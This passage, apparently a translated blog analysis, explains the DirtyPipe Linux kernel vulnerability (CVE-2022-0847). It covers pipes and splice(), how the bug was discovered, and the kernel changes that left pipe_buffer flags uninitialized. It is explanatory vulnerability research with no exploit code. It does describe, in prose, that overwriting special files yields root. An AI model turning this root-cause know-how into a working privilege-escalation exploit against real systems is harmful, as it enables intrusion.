The returned array pipefd[2] represents the two ends of the pipe: pipefd[0] is the read end and pipefd[1] is the write end. Written data is buffered in the kernel.
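A minimal round trip through a pipe within a single process might look like the sketch below. The function name is made up, and the message is assumed to be much shorter than the pipe capacity so that the write cannot block.

```c
#include <string.h>
#include <unistd.h>

/* Sends msg through a new pipe and reads it back into out (capacity cap).
 * Returns the number of bytes read, or -1 on error. msg must fit into
 * the pipe, otherwise write() would block. */
long demo_pipe_roundtrip(const char *msg, char *out, size_t cap)
{
    int pipefd[2];
    long n = -1;
    size_t len = strlen(msg);

    if (pipe(pipefd))
        return -1;
    /* write to the write end, then read from the read end */
    if (write(pipefd[1], msg, len) == (ssize_t)len)
        n = (long)read(pipefd[0], out, cap);
    close(pipefd[0]);
    close(pipefd[1]);
    return n;
}
```

In practice the two ends are usually held by different processes, for example a parent and a child after fork(); a single process is used here only to keep the example short.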
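splice
splice is a zero-copy mechanism built on pipes. It moves data between two file descriptors without copying the data from kernel space to user space and back again. Its libc wrapper is declared as follows: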
```c
#define _GNU_SOURCE
#include <fcntl.h>

ssize_t splice(int fd_in, off64_t *off_in, int fd_out,
               off64_t *off_out, size_t len, unsigned int flags);
```
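It moves len bytes from fd_in (starting at offset *off_in) to fd_out. The condition is that at least one of fd_in and fd_out is a pipe file descriptor, and the offset argument belonging to a pipe (off_in or off_out) must be NULL. This leaves three cases: both in and out are pipes, in is a pipe and out is not, or in is not a pipe and out is. The kernel handles each case differently.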
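The story behind it
Discovery
The author, Max Kellermann, documented the discovery of this vulnerability in detail on his blog.
In April 2021 he received the first support ticket about corrupted files (he does not appear to be a professional security researcher). Over more than half a year he worked his way, one pitfall at a time, from the application layer down into the kernel, and in February 2022 he finally confirmed that the root cause was a Linux kernel vulnerability.
The confusion and disbelief he felt along the way come through between the lines, and I truly admire his courage and persistence in getting to the bottom of it.
This kind of vulnerability is hard to find. Unlike most memory corruption bugs, which show obvious symptoms (crash, hang, reboot), its only effect is that some bytes of a file on disk change, which is hard to notice even when it happens. Yet it is very convenient to exploit: there is no need to build a ROP chain in the kernel step by step, bypass the various mitigations, and return to user space for a root shell. Modifying a few special files from the application layer is enough to escalate privileges, calmly and reliably.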
Code history
See: Linux 内核提权 DirtyPipe(CVE-2022-0847)漏洞分析
How the code around the splice system call evolved:
Linux 2.6: the splice system call is introduced
patch: Introduce sys_splice() system call
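Linux 4.9: iov_iter gains support for pipes
patch: new iov_iter flavour: pipe-backed
Starting with this version, copy_page_to_iter_pipe() and push_pipe() exist, and neither of them initializes pipe_buffer->flags. At this point flags does not yet carry a merge attribute, so the omission has no effect.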
Linux 5.1: the can_merge member is removed from pipe_buf_operations
patch: pipe: stop using ->can_merge
pipe_write() now uses pipe_buf_can_merge() to tell pipe_buffers apart; only a pipe_buffer registered with anon_pipe_buf_ops passes the check.
```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    /* ... */
    if (pipe_buf_can_merge(buf) && offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

        ret = copy_page_from_iter(buf->page, offset, chars, from);
        /* ... */
    }
    /* ... */
}

static bool pipe_buf_can_merge(struct pipe_buffer *buf)
{
    return buf->ops == &anon_pipe_buf_ops;
}
```
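Linux 5.8: the various pipe_buf_operations variants are merged and the PIPE_BUF_FLAG_CAN_MERGE attribute is added
patch: pipe: merge anon_pipe_buf*_ops
This version merges the different anonymous pipe_buf_operations variants (they were all identical, so there was no need to define them separately) and adds the PIPE_BUF_FLAG_CAN_MERGE attribute to the flags member of pipe_buffer.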
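Because flags had been left uninitialized in copy_page_to_iter_pipe() and push_pipe() ever since Linux 4.9, this newly added attribute is what turned the latent bug into a vulnerability.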
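The change in how mergeability is decided can be contrasted in a few lines. This is a simplified model rather than kernel code: the hist_* names are hypothetical, an enum stands in for the ops pointer, and HIST_CAN_MERGE is an illustrative flag value.

```c
#include <stdbool.h>

#define HIST_CAN_MERGE 0x10u /* illustrative flag value */

enum hist_ops_kind { HIST_ANON_OPS, HIST_PAGE_CACHE_OPS };

struct hist_pipe_buffer {
    enum hist_ops_kind ops;
    unsigned int flags;
};

/* Linux 5.1 style: mergeability is derived from the ops the buffer uses. */
bool hist_can_merge_by_ops(const struct hist_pipe_buffer *buf)
{
    return buf->ops == HIST_ANON_OPS;
}

/* Linux 5.8 style: mergeability is read from the flags field. */
bool hist_can_merge_by_flag(const struct hist_pipe_buffer *buf)
{
    return (buf->flags & HIST_CAN_MERGE) != 0;
}
```

For a page cache buffer whose flags field still holds a stale merge bit, the ops-based check says no and the flag-based check says yes. The uninitialized field was harmless under the older check and became exploitable under the newer one.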
References
The Dirty Pipe Vulnerability
DirtyPipe(CVE-2022-0847)漏洞分析
终端安全 | DirtyPipe(CVE-2022-0847)漏洞分析
Linux 的进程间通信:管道
看一遍就理解:零拷贝详解
linux网络编程九:splice函数,高效的零拷贝
LINUX系统调用SENDFILE和SPLICE简单分析
图解 | Linux进程通信 - 管道实现
O_DIRECT - Linux 直接I/O 原理与实现
IO - filemap - 1 Bufferd IO